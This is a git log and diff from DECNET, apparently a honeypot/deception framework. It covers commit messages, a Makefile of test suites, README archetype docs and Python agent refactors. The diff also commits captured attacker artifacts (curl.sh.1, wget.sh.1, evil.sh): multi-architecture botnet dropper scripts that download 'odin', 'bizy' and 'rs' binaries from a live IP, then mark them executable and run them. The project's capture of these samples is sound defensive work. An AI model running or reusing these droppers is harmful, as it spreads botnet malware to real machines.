2026-04-28 22:03:58 -04:00
e3ddeb0395 feat(bounty): surface file drops and stored mail in the Vault
The Bounty Vault page only read from the Bounty table, but
inotifywait-captured file drops (event_type=file_captured) and SMTP
quarantined messages (event_type=message_stored) were only landing in
the Logs table. AttackerDetail's tabs queried logs directly, so they
showed up per-attacker but were invisible on the global Vault page.

Mirror both events into Bounty as bounty_type=artifact with
payload.kind ∈ {file, mail} so the existing dedup
(bounty_type, attacker_ip, payload) collapses repeats by sha256. Add an
ARTIFACTS segment to the Vault filter row, plus dedicated render
branches: file drops show orig_path + size + writer attribution; mail
shows subject + From + attachment count + size, with the Mail icon
distinguishing them from FileText for file drops.

Forward-only — existing logs stay where they are. A backfill pass would
be straightforward (read Log WHERE event_type IN ('file_captured',
'message_stored') and feed each row through _extract_bounty) but is out
of scope here.
2026-04-28 19:42:54 -04:00
88f276e9e7 feat(collector): drop native unix daemon syslog from ingestion
sshd, pam_unix, sudo, CRON, systemd, kernel, rsyslogd, and dbus-daemon
all share the SSH/telnet decky containers and write to the same syslog
socket as DECNET's own emitters. Their output was being parsed and
ingested into the JSON stream, the dashboard, and the profiler — pure
noise: sshd's "Failed password for root from X" duplicates the
auth-helper's structured auth_attempt event, pam_unix repeats it again,
CRON/systemd say nothing about attacker behavior.

Drop these APP-NAMEs in _should_ingest before the JSON write and bus
publish. Raw .log file still captures everything for forensics. The
denylist is overridable with DECNET_COLLECTOR_DROP_APPS so operators
can extend it without code changes.
2026-04-28 19:21:39 -04:00
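The denylist in 88f276e9e7 might be wired up as below. A sketch under assumptions: the env var is read as a comma-separated list that replaces the default set, and neither the format nor the replace-vs-extend behaviour is stated in the commit.

```python
import os
from typing import Mapping, Optional

_DEFAULT_DROP = frozenset({
    "sshd", "pam_unix", "sudo", "CRON",
    "systemd", "kernel", "rsyslogd", "dbus-daemon",
})


def drop_apps(env: Optional[Mapping[str, str]] = None) -> frozenset:
    env = os.environ if env is None else env
    raw = env.get("DECNET_COLLECTOR_DROP_APPS")
    if raw is None:
        return _DEFAULT_DROP
    # Assumed format: comma-separated APP-NAMEs, whitespace ignored.
    return frozenset(part.strip() for part in raw.split(",") if part.strip())


def should_ingest(app_name: str, env: Optional[Mapping[str, str]] = None) -> bool:
    """False for native daemon noise; the raw .log file is unaffected."""
    return app_name not in drop_apps(env)
```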
6055f9c837 fix(deckies): set MSGID=command on bash PROMPT_COMMAND syslog lines
Add --rfc5424 --msgid command to the logger invocation in SSH and telnet
decky bashrc. MSGID arrives as "command" instead of NIL, which is what
the profiler's _COMMAND_EVENT_TYPES filter expects. The parser heuristic
shipped in d4591b3 stays as a safety net for any future emitter that
forgets the flags or for inflight pre-rebuild containers.
2026-04-28 19:12:11 -04:00
d4591b38dc fix(profiler): aggregate bash PROMPT_COMMAND lines into attacker profile
SSH/telnet decky containers emit shell commands via `logger -t bash "CMD …"`
which produces RFC 5424 lines with MSGID=NIL. Both parsers were leaving
event_type="-", so the behavioral profiler's `_COMMAND_EVENT_TYPES` filter
silently dropped them — the IP profile existed but no command transcripts
or artifacts. Confirmed in the wild: 44/48 events from one attacker were
event_type="-".

Rewrite event_type to "command" in both parsers when MSGID=NIL and the
msg starts with "CMD ". Correlation parser also extracts the cmd= payload
into fields["command"] so the profiler can build the transcript; collector
parser leaves fields={} to avoid duplicate pills in the dashboard.
2026-04-28 19:09:41 -04:00
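The parser heuristic from d4591b38dc comes down to one condition. A minimal sketch: the function names are hypothetical, "-" is the RFC 5424 NILVALUE, and the cmd= extraction assumes the command is the tail of the message, which the commit does not spell out.

```python
from typing import Optional


def normalise_event_type(msgid: str, msg: str) -> str:
    """Rewrite NIL MSGIDs on bash PROMPT_COMMAND lines to 'command'."""
    if msgid == "-" and msg.startswith("CMD "):
        return "command"
    return msgid


def extract_command(msg: str) -> Optional[str]:
    # Assumption: everything after the first 'cmd=' is the command text.
    marker = "cmd="
    index = msg.find(marker)
    return msg[index + len(marker):] if index != -1 else None
```

Only the correlation parser would call extract_command; per the commit, the collector parser leaves fields empty to avoid duplicate pills in the dashboard.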
862e4dbb31 merge: testing → main (reconcile 2-week divergence) 2026-04-28 18:36:00 -04:00
DECNET CI
499836c9e4 chore: auto-release v0.2 [skip ci] 2026-04-13 11:50:02 +00:00
bb9c782c41 Merge pull request 'tofix/merge-testing-to-main' (#6) from tofix/merge-testing-to-main into main
Some checks failed
Reviewed-on: #6
2026-04-13 13:49:47 +02:00
597854cc06 Merge branch 'merge/testing-to-main' into tofix/merge-testing-to-main
Some checks failed
2026-04-13 07:48:43 -04:00
3b4b0a1016 merge: resolve conflicts between testing and main (remove tracked settings, fix pyproject deps) 2026-04-13 07:48:37 -04:00
DECNET CI
8ad3350d51 ci: auto-merge dev → testing [skip ci] 2026-04-13 05:55:46 +00:00
23ec470988 Merge pull request 'fix/merge-testing-to-main' (#4) from fix/merge-testing-to-main into main
Some checks failed
Reviewed-on: #4
2026-04-12 10:10:19 +02:00
4064e19af1 merge: resolve conflicts between testing and main
Some checks failed
2026-04-12 04:09:17 -04:00
DECNET CI
ac4e5e1570 ci: auto-merge dev → testing
All checks were successful
2026-04-12 07:53:07 +00:00
eb40be2161 chore: split dev and normal dependencies in pyproject.toml 2026-04-08 00:09:15 -04:00
0927d9e1e8 Modified: DEVELOPMENT.md 2026-04-06 12:03:36 -04:00
9c81fb4739 revert f64c251a9e
revert revert f8a9f8fc64

revert Added: modified notes. Finished CI/CD pipeline.
2026-04-06 18:02:28 +02:00
e4171789a8 Added: documentation about the deaddeck archetype and how to run it. 2026-04-06 11:51:24 -04:00
f64c251a9e revert f8a9f8fc64
revert Added: modified notes. Finished CI/CD pipeline.
2026-04-06 17:15:32 +02:00
c56c9fe667 Merge pull request 'Auto PR: dev → main' (#2) from dev into main
Some checks failed
Reviewed-on: #2
2026-04-06 17:11:54 +02:00
897f498bcd Merge dev into main: resolve conflicts, keep tests out of main
Some checks failed
2026-04-04 18:00:17 -03:00
92e06cb193 Add release workflow for auto-tagging and Docker image builds
Some checks failed
2026-04-04 17:16:53 -03:00
7ad7e1e53b main: remove tests and pytest dependency 2026-04-04 16:28:33 -03:00
963 changed files with 93452 additions and 9225 deletions

19
.gitignore vendored

@@ -51,3 +51,22 @@ schem
# pydeps-style dependency graph dumps from local analysis runs.
deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
!tests/ttp/rule_precision/corpus/seed_*.jsonl
threatfox-api.json
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
enterprise-attack-*.json
# pytest failure dump files
testfail

219
Makefile Normal file

@@ -0,0 +1,219 @@
PYTEST := .311/bin/pytest
FAIL_FAST ?= 1
ARGS :=

# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
# Unit suites inherit that; special suites clear it with --override-ini.
UNIT_FLAGS := --timeout=30 --timeout-method=thread
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
    --ignore=tests/api/test_schemathesis.py \
    --ignore=tests/api/test_schemathesis_agent.py \
    --ignore=tests/api/test_schemathesis_swarm.py \
    --ignore=tests/api/test_schemathesis_ttp.py
SCHEMA_QUICK ?= 0
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench

# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────

.PHONY: test-core
test-core:
	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)

.PHONY: test-web
test-web:
	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)

.PHONY: test-db
test-db:
	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)

.PHONY: test-bus
test-bus:
	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)

.PHONY: test-ttp
test-ttp:
	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)

.PHONY: test-intel
test-intel:
	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)

.PHONY: test-analysis
test-analysis:
	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)

.PHONY: test-infra
test-infra:
	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)

.PHONY: test-fleet
test-fleet:
	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)

.PHONY: test-cli
test-cli:
	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)

.PHONY: test-features
test-features:
	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)

# ── Go and React suites ───────────────────────────────────────────────────────

_GO_MODULES := \
    decnet/templates/_caddy_modules/decnetfp \
    decnet/templates/http/_caddy_modules/decnetfp \
    decnet/templates/https/_caddy_modules/decnetfp

.PHONY: test-go
test-go:
	@failed=""; \
	for mod in $(_GO_MODULES); do \
		echo "=== go test: $$mod ==="; \
		if (cd "$$mod" && go test ./...); then \
			echo "[PASS] $$mod"; \
		else \
			echo "[FAIL] $$mod"; \
			failed="$$failed $$mod"; \
			if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
		fi; \
	done; \
	[ -z "$$failed" ]

.PHONY: test-react
test-react:
	cd decnet_web && npm run test:run $(ARGS)

# ── Special suites (sequential, longer timeout) ───────────────────────────────

.PHONY: test-live
test-live:
	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)

.PHONY: test-api
test-api:
	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)

.PHONY: test-stress
test-stress:
	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)

.PHONY: test-service
test-service:
	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)

.PHONY: test-fuzz
test-fuzz:
	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)

.PHONY: test-schema
test-schema:
	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
		tests/api/test_schemathesis.py \
		tests/api/test_schemathesis_agent.py \
		tests/api/test_schemathesis_swarm.py \
		tests/api/test_schemathesis_ttp.py \
		$(SCHEMA_FLAGS) $(ARGS)

.PHONY: test-bench
test-bench:
	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)

.PHONY: test-docker
test-docker:
	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)

# ── Static analysis ───────────────────────────────────────────────────────────

.PHONY: test-mypy
test-mypy:
	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary

.PHONY: test-bandit
test-bandit:
	.311/bin/bandit -r decnet -c pyproject.toml

.PHONY: test-vulture
test-vulture:
	.311/bin/vulture decnet --min-confidence 80

.PHONY: test-pip-audit
test-pip-audit:
	.311/bin/pip-audit

# ── Composite: all suites ─────────────────────────────────────────────────────

_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
    go react \
    live api schema stress service fuzz bench docker \
    mypy bandit vulture pip-audit

.PHONY: test-all test
test-all test:
	@failed=""; \
	for suite in $(_ALL_SUITES); do \
		echo ""; \
		echo "══════════════════════════ $$suite ══════════════════════════"; \
		if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
			echo "[PASS] $$suite"; \
		else \
			echo "[FAIL] $$suite"; \
			failed="$$failed $$suite"; \
			if [ "$(FAIL_FAST)" = "1" ]; then \
				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
				exit 1; \
			fi; \
		fi; \
	done; \
	if [ -n "$$failed" ]; then \
		echo ""; \
		echo "Failed:$$failed"; \
		exit 1; \
	fi; \
	echo ""; \
	echo "All suites passed."

.PHONY: help
help:
	@echo "Unit suites (xdist, 30s timeout):"
	@echo "  make test-core       tests/core + config + factories + fixtures"
	@echo "  make test-web        tests/web + services"
	@echo "  make test-db         tests/db + vectorstore"
	@echo "  make test-bus        tests/bus + logging + telemetry"
	@echo "  make test-ttp        tests/ttp"
	@echo "  make test-intel      tests/intel + asn + geoip"
	@echo "  make test-analysis   tests/clustering + correlation"
	@echo "  make test-infra      tests/agent + collector + sniffer + profiler"
	@echo "  make test-fleet      tests/fleet + swarm + topology + orchestrator + deploy + updater"
	@echo "  make test-cli        tests/cli + engine + mutator + realism"
	@echo "  make test-features   tests/canary + artifacts + webhook + decky_io + prober"
	@echo ""
	@echo "Go / React suites:"
	@echo "  make test-go         go test ./... in each Caddy module variant"
	@echo "  make test-react      vitest run in decnet_web"
	@echo ""
	@echo "Special suites (sequential, 120s timeout unless noted):"
	@echo "  make test-live       tests/live"
	@echo "  make test-api        tests/api (schemathesis)"
	@echo "  make test-stress     tests/stress"
	@echo "  make test-service    tests/service_testing"
	@echo "  make test-schema     schemathesis contract tests (-m fuzz, xdist -n 4, 600s timeout)"
	@echo "  make test-schema SCHEMA_QUICK=1  same, capped at 100 examples per test"
	@echo "  make test-fuzz       hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
	@echo "  make test-bench      tests/perf"
	@echo "  make test-docker     tests/docker (sets DECNET_LIVE_DOCKER=1)"
	@echo ""
	@echo "Static analysis:"
	@echo "  make test-mypy       mypy type check on decnet/"
	@echo "  make test-bandit     bandit security scan on decnet/"
	@echo "  make test-vulture    vulture dead code scan (>=80% confidence)"
	@echo "  make test-pip-audit  pip-audit dependency vulnerability scan"
	@echo ""
	@echo "Composites:"
	@echo "  make test-all        ALL suites (unit + go + react + live + api + schema + stress + service + fuzz + bench + docker + static analysis)"
	@echo "  make test-all FAIL_FAST=0  same, report all failures instead of stopping"
	@echo ""
	@echo "Passthrough: make test-web ARGS='--lf -s'"

View File

@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description |
|---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.

```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin

[decky-webmail.http]
server_header = Apache/2.4.54 (Debian)
fake_app = wordpress

3
artifacts/curl.sh Normal file

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

46
artifacts/curl.sh.1 Normal file

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

3
artifacts/evil.sh Normal file

@@ -0,0 +1,3 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

3
artifacts/wget.sh Normal file

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

46
artifacts/wget.sh.1 Normal file

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

0
bait/.gitkeep Normal file

5
bait/README.md Normal file

@@ -0,0 +1,5 @@
# bait/
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
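
A minimal sketch of checking a JSON seed file against the shape described above before dropping it into `bait/`. The `validate_seed` helper and the sample entry are hypothetical illustrations; the real loader lives in `decnet/templates/imap/server.py` and may accept or reject input differently.

```python
import json

# Keys taken from the README text above.
REQUIRED_KEYS = ("from_addr", "to_addr", "subject", "body")
OPTIONAL_KEYS = ("from_name", "date", "flags")


def validate_seed(text: str) -> list[dict]:
    """Parse a JSON seed document and check the required keys.

    Hypothetical helper for illustration, not the DECNET loader.
    """
    data = json.loads(text)
    if not isinstance(data, list):
        raise ValueError("seed must be a JSON list of objects")
    for i, entry in enumerate(data):
        if not isinstance(entry, dict):
            raise ValueError(f"entry {i} is not an object")
        missing = [key for key in REQUIRED_KEYS if key not in entry]
        if missing:
            raise ValueError(f"entry {i} is missing required keys: {missing}")
    return data


# Sample entry with made-up addresses.
sample = json.dumps([
    {
        "from_addr": "it-support@example.com",
        "to_addr": "alice@example.com",
        "subject": "Password rotation reminder",
        "body": "Please rotate your VPN password by Friday.",
        "from_name": "IT Support",
    }
])

entries = validate_seed(sample)
print(f"{len(entries)} seed entry validated")
```

Checking only the required keys keeps the sketch tolerant of fields the loader might add later.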

BIN
decnet.tar Normal file

Binary file not shown.

View File

@@ -194,7 +194,7 @@ async def self_destruct() -> None:
     argv = ["/bin/bash", path]
     spawn_kwargs = {"start_new_session": True}
-    subprocess.Popen(  # nosec B603
+    subprocess.Popen(  # type: ignore[call-overload]  # nosec B603
         argv,
         stdin=subprocess.DEVNULL,
         stdout=subprocess.DEVNULL,

View File

@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
         return None
     try:
-        from decnet import __version__ as _v
+        from decnet import __version__ as _v  # type: ignore[attr-defined]
         agent_version = _v
     except Exception:
         agent_version = "unknown"

View File

@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
    return str(tid)


def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Verify hash integrity and structural validity; return topology_id."""
    local_hash = canonical_hash(hydrated)
    if local_hash != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )
    issues = _validate_topology(hydrated)
    if _validation_errors(issues):
        raise ValidationError(issues)
    return _topology_id(hydrated)


async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
    """Tear down the current topology if it differs from topology_id.

    Master is authoritative — a different pinned topology (fully applied,
    partially applied, or drifted) is torn down before the new apply proceeds.
    Refusing with 409 would leave the agent stuck in a state only a human
    could resolve.
    """
    existing = store.current()
    if existing is None or existing.topology_id == topology_id:
        return
    log.info(
        "superseding topology %s with %s on master authority",
        existing.topology_id, topology_id,
    )
    try:
        await teardown(existing.topology_id, store)
    except Exception as exc:  # noqa: BLE001 — we still want to try applying
        log.warning(
            "best-effort teardown of superseded topology %s failed: %s",
            existing.topology_id, exc,
        )
        # Hard-clear the store row so the new apply isn't blocked by a
        # half-torn-down predecessor. Leftover docker objects surface via
        # the next heartbeat's observed block.
        store.clear(existing.topology_id)


def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Create bridge networks, write compose file, and bring up containers.

    Sync/blocking — callers must dispatch via asyncio.to_thread.

    ``--always-recreate-deps`` keeps service containers' netns shares
    fresh: every decky service joins its base's netns via
    ``network_mode: container:<base>``, and that share is bound at
    service start time. If a base is recreated (e.g. when ``ports:``
    changes after toggling ``forwards_l3``) but compose decides the
    services are unchanged, the services keep a stale netns FD
    pointing at the destroyed base — they end up in an empty
    namespace with only ``lo``, and external traffic hits a closed
    port on the live base. Forcing dependents to recreate alongside
    the base is the cheapest way to make this race impossible.
    """
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()
    for lan in hydrated["lans"]:
        net_name = _topology_network_name(topology_id, lan["name"])
        create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
    write_topology_compose(hydrated, compose_path)
    _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)


async def apply(
    hydrated: dict[str, Any],
    version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
     Any docker / compose error propagates up; the endpoint maps it
     to 500 and records the message on the store row.
     """
-    local_hash = canonical_hash(hydrated)
-    if local_hash != version_hash:
-        raise HashMismatch(
-            f"master hash {version_hash!r} does not match agent hash "
-            f"{local_hash!r} — refusing to apply"
-        )
-    issues = _validate_topology(hydrated)
-    if _validation_errors(issues):
-        raise ValidationError(issues)
-    topology_id = _topology_id(hydrated)
-    # Master is authoritative. If a different topology is pinned here
-    # — whether it fully applied, only partially applied (failure
-    # marker row + orphan containers), or drifted — teardown first,
-    # then accept the new one. Refusing with 409 would leave the
-    # agent stuck in a state only a human could resolve.
-    existing = store.current()
-    if existing is not None and existing.topology_id != topology_id:
-        log.info(
-            "superseding topology %s with %s on master authority",
-            existing.topology_id, topology_id,
-        )
-        try:
-            await teardown(existing.topology_id, store)
-        except Exception as exc:  # noqa: BLE001 — we still want to try applying
-            log.warning(
-                "best-effort teardown of superseded topology %s failed: %s",
-                existing.topology_id, exc,
-            )
-            # Hard-clear the store row so the new apply isn't blocked
-            # by a half-torn-down predecessor. Leftover docker objects
-            # will surface via the next heartbeat's observed block.
-            store.clear(existing.topology_id)
